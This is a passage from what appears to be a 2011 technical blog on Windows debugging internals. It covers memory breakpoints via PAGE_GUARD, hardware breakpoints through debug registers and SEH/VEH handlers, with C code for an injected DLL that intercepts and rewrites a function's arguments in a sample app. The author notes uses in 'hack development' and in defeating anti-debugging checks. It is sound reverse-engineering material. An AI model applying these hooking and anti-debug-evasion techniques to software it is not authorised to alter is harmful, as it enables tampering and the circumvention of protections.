            modify_text(debug_context);
        }
        MEMORY_BASIC_INFORMATION mem_info;
        DWORD old_protections = 0;
        VirtualQuery((LPCVOID)func_addr, &mem_info, sizeof(MEMORY_BASIC_INFORMATION));
        VirtualProtect(mem_info.BaseAddress, mem_info.RegionSize, mem_info.AllocationProtect | PAGE_GUARD,
            &old_protections);
        return EXCEPTION_CONTINUE_EXECUTION;
    }
    return EXCEPTION_CONTINUE_SEARCH;
}

Setting the breakpoint:

MEMORY_BASIC_INFORMATION mem_info;
DWORD old_protections = 0;
VirtualQuery((LPCVOID)func_addr, &mem_info, sizeof(MEMORY_BASIC_INFORMATION));
VirtualProtect(mem_info.BaseAddress, mem_info.RegionSize, mem_info.AllocationProtect | PAGE_GUARD,
    &old_protections);

It is a pretty interesting technique, and is also how OllyDbg implements its memory breakpoints. The downside though is that it works at the page boundary and can considerably slow down execution time — depending on how often the page is accessed.
Full source for memory breakpoints can be found here
A downloadable PDF of this post can be found here

March 21, 2011

Hardware Breakpoints and Structured/Vectored Exception Handling

Filed under: General x86 — admin @ 11:25 PM

Some good references to read prior to this post. In short, to use hardware breakpoints there are eight debug registers (DR0 to DR7) that can be utilized. Eight, however, is a bit of an overstatement: DR4 and DR5 are reserved and act as aliases for DR6 and DR7, so there are really six. The debug registers DR0 – DR3 can each hold a linear address to break on depending on how the debug control (DR7) register is set. The debug status (DR6) register lets a debugger determine which debug conditions have occurred. Therefore, you are permitted four addresses to set hardware breakpoints on (assuming that they’re not being chained across threads). What is the utility of these breakpoints? For one, they don’t modify the code that breakpoints are hit on. This is especially useful in the context of defeating simple anti-debugging mechanisms that check function prologues for hooks. All that is required is to install a run-time exception handler and set up hardware breakpoints in the context of the application’s main thread, or the thread that is executing the desired code to break on. This can be done with Windows Structured Exception Handling capabilities. Structured Exception Handlers (SEHs) in Windows are stored as a linked list. When an exception is raised, this list is traversed until a handler for the exception is found. If one is found then the handler gains execution of the program and handles the exception. If one is not found then the application goes into an undefined state and may crash depending on the type of exception. Vectored Exception Handlers (VEHs) are extensions of SEH that can be installed to watch and handle all exceptions that an application generates. In an application, VEHs are typically added through AddVectoredExceptionHandler instead of __try/__except blocks like SEH. This, however, is pretty irrelevant in terms of hack development: both SEHs and VEHs should be added at runtime.
The main benefit that VEHs have is that they are always invoked prior to SEHs (being a “new” feature included in WinXP), and that AddVectoredExceptionHandler lets you specify whether you want your exception handler to be the first one to be called when an exception is raised. This leads most people to prefer VEHs over SEHs nowadays.
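How DR7 "is set" comes down to a handful of bit fields: a local enable bit for each of DR0 to DR3 in bits 0, 2, 4, and 6, and a four-bit condition/length field per breakpoint starting at bit 16. The sketch below composes such a value in portable C. The helper name and enum constants are hypothetical and are not taken from the sample application; it only builds the number that would be stored in the Dr7 field of a thread context.

```c
#include <assert.h>
#include <stdint.h>

/* Break conditions (RW field): 0 = execute, 1 = write, 3 = read or write. */
enum { BP_EXECUTE = 0, BP_WRITE = 1, BP_READWRITE = 3 };
/* Lengths (LEN field): 0 = 1 byte, 1 = 2 bytes, 3 = 4 bytes. */
enum { BP_LEN_1 = 0, BP_LEN_2 = 1, BP_LEN_4 = 3 };

/* Hypothetical helper: returns dr7 with breakpoint `index` (0 to 3)
   locally enabled for the given condition and length. */
uint32_t dr7_enable_local(uint32_t dr7, unsigned int index,
                          unsigned int condition, unsigned int length) {
    assert(index < 4 && condition < 4 && length < 4);
    unsigned int field_shift = 16 + index * 4;
    dr7 &= ~((uint32_t)0xF << field_shift);                   /* clear RW/LEN */
    dr7 |= (uint32_t)(condition | (length << 2)) << field_shift;
    dr7 |= (uint32_t)1 << (index * 2);                        /* local enable */
    return dr7;
}
```

An execute breakpoint in DR0 uses a length of one byte and yields 0x00000001; a four-byte write breakpoint in DR1 yields 0x00D00004.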

To illustrate SEH/VEH I’ve developed a sample application. An injected DLL will install SEH and VEH handlers that will break upon entry to a certain function (whose address is noted in the dialog field for convenience). The goal is to break on the function that takes the text in the enabled edit control and puts it in the disabled edit control following “Current Text:”.

The code for all of this is relatively straightforward. The full listing using SEH is shown below:

#include <Windows.h>
#include <TlHelp32.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>
 
const DWORD func_addr = 0x00401000;
const DWORD func_addr_offset = func_addr + 0x1;
 
void print_parameters(PCONTEXT debug_context) {
    printf("EAX: %X EBX: %X ECX: %X EDX: %X\n",
        debug_context->Eax, debug_context->Ebx, debug_context->Ecx, debug_context->Edx);
    printf("ESP: %X EBP: %X\n",
        debug_context->Esp, debug_context->Ebp);
    printf("ESI: %X EDI: %X\n",
        debug_context->Esi, debug_context->Edi);
    // At function entry [ESP] holds the return address, so the
    // parameters start at ESP + 0x4.
    printf("Parameters\n"
        "HWND: %X\n"
        "text: %s\n"
        "length: %i\n",
        *(DWORD*)(debug_context->Esp + 0x4),
        (char*)(*(DWORD*)(debug_context->Esp + 0x8)),
        (int)(*(DWORD*)(debug_context->Esp + 0xC)));
}
 
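void modify_text(PCONTEXT debug_context) {
    char* text = (char*)(*(DWORD*)(debug_context->Esp + 0x8));
    // Overwrite in place, never writing past the length of the existing string.
    // If the original text is shorter than "REPLACED", _snprintf truncates without
    // appending a terminator, so the string's original terminator stays in effect.
    size_t length = strlen(text);
    _snprintf(text, length, "REPLACED");
}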
 
void __declspec(naked) change_text_stub(void) {
    __asm {
        push ebp
        jmp [func_addr_offset]
    }
}
 
LONG WINAPI ExceptionFilter(PEXCEPTION_POINTERS ExceptionInfo) {
    if(ExceptionInfo->ExceptionRecord->ExceptionCode == EXCEPTION_SINGLE_STEP) {
        if((DWORD)ExceptionInfo->ExceptionRecord->ExceptionAddress == func_addr) {
            PCONTEXT debug_context = ExceptionInfo->ContextRecord;
            printf("Breakpoint hit!\n");
            print_parameters(debug_context);
            modify_text(debug_context);
            debug_context->Eip = (DWORD)&change_text_stub;
            return EXCEPTION_CONTINUE_EXECUTION;
        }
    }
    return EXCEPTION_CONTINUE_SEARCH;
}
 
void set_breakpoints(void) {
    HANDLE hTool32 = CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);
    if(hTool32 != INVALID_HANDLE_VALUE) {
        THREADENTRY32 thread_entry32;
        thread_entry32.dwSize = sizeof(THREADENTRY32);
        FILETIME exit_time, kernel_time, user_time;
        FILETIME creation_time;
        FILETIME prev_creation_time;
        prev_creation_time.dwLowDateTime = 0xFFFFFFFF;
        prev_creation_time.dwHighDateTime = INT_MAX;
        HANDLE hMainThread = NULL;
        if(Thread32First(hTool32, &thread_entry32)) {
            do {
                if(thread_entry32.dwSize >= FIELD_OFFSET(THREADENTRY32, th32OwnerProcessID) + sizeof(thread_entry32.th32OwnerProcessID)
                    && thread_entry32.th32OwnerProcessID == GetCurrentProcessId()
                    && thread_entry32.th32ThreadID != GetCurrentThreadId()) {
                        HANDLE hThread = OpenThread(THREAD_SET_CONTEXT | THREAD_GET_CONTEXT | THREAD_QUERY_INFORMATION,
                            FALSE, thread_entry32.th32ThreadID);
                        // Only compare creation times for threads that could be opened and
                        // queried; otherwise creation_time would be read uninitialized.
                        if(hThread != NULL
                            && GetThreadTimes(hThread, &creation_time, &exit_time, &kernel_time, &user_time)
                            && CompareFileTime(&creation_time, &prev_creation_time) == -1) {
                            memcpy(&prev_creation_time, &creation_time, sizeof(FILETIME));
                            if(hMainThread != NULL)
                                CloseHandle(hMainThread);
                            hMainThread = hThread;
                        }
                        else if(hThread != NULL)
                            CloseHandle(hThread);
                }
                thread_entry32.dwSize = sizeof(THREADENTRY32);
            } while(Thread32Next(hTool32, &thread_entry32));
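            (void)SetUnhandledExceptionFilter(ExceptionFilter);
            // hMainThread stays NULL if no other thread of this process could be opened.
            if(hMainThread != NULL) {
                CONTEXT thread_context = {CONTEXT_DEBUG_REGISTERS};
                thread_context.Dr0 = func_addr;
                // Bit 0 of DR7 is L0, the local enable bit for DR0. The R/W0 and LEN0
                // fields stay zero, which selects a one-byte execute breakpoint.
                thread_context.Dr7 = (1 << 0);
                SetThreadContext(hMainThread, &thread_context);
                CloseHandle(hMainThread);
            }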
        }
        CloseHandle(hTool32);
    }
}
 
int APIENTRY DllMain(HMODULE hModule, DWORD reason, LPVOID reserved) {
    if(reason == DLL_PROCESS_ATTACH) {
        DisableThreadLibraryCalls(hModule);
        if(AllocConsole()) {
            freopen("CONOUT$", "w", stdout);
            SetConsoleTitle(L"Console");
            SetConsoleTextAttribute(GetStdHandle(STD_OUTPUT_HANDLE), FOREGROUND_RED | FOREGROUND_GREEN | FOREGROUND_BLUE);
            printf("DLL loaded.\n");
        }
        set_breakpoints();
    }
    return TRUE;
}

The DLL entry point sets up a console for debugging purposes and sets the breakpoints. The set_breakpoints function works by taking a snapshot of all threads on the system and iterating through them, considering only the threads that belong to the target process. The thread with the earliest creation time within the application is taken to be the main thread, and its handle is kept so the debug registers can be set up. Once the main thread is found, the actual SEH handler can be installed. SetUnhandledExceptionFilter sets the ExceptionFilter function as the top-level exception filter, which is called only when no other handler deals with the exception (so after any VEHs and frame-based SEH handlers) and only when the process is not being debugged. The CONTEXT structure is set up with ContextFlags being CONTEXT_DEBUG_REGISTERS, DR0 is set to the desired address, and bit 0 of DR7 (the local enable bit for DR0) is set. The CONTEXT of the main thread is then set to this new context and the breakpoint is now active.

When the breakpoint fires, a single-step exception is raised and ExceptionFilter checks whether it occurred at the desired address. If so, the exception is handled, and the context record (containing, among other things, the values of all registers and flags when the breakpoint was hit) is available for inspection. The function sets up a standard EBP-based frame, but that frame has not been set up yet when the breakpoint is hit, so the parameters are retrieved through ESP instead. All registers and parameters can then be inspected and/or modified as shown in print_parameters and modify_text. The pictures below show how this looks at run-time:


An important thing to note in the code is the need for the stub function. The stub contains the first instruction of the function that has the breakpoint on it (push ebp, which is one byte long) and then jumps one byte past the breakpoint address, where the next instruction starts. This is needed because if EIP is not modified, execution resumes at the breakpoint address, the exception is raised again once the handler finishes, and an infinite loop occurs. Making a stub function is a quick workaround to that problem. That is pretty much all there is to it in terms of SEH. Removing the breakpoints is as simple as clearing the debug registers in the main thread (not shown in the code for simplicity).
The technique does not differ much for VEH. To use VEH instead of SEH, only one modification needs to be made: change (void)SetUnhandledExceptionFilter(ExceptionFilter); to (void)AddVectoredExceptionHandler(1, ExceptionFilter);. The VEH can be removed by clearing the debug registers and calling RemoveVectoredExceptionHandler. Note that AddVectoredExceptionHandler returns a handle to the exception handler, which I chose to ignore for the sake of showing the technique and saving space. This return value is needed if the handler is to be removed at a later time, since RemoveVectoredExceptionHandler requires it.
Code and sample application for SEH/VEH can be found here
A downloadable PDF of this post can be found here
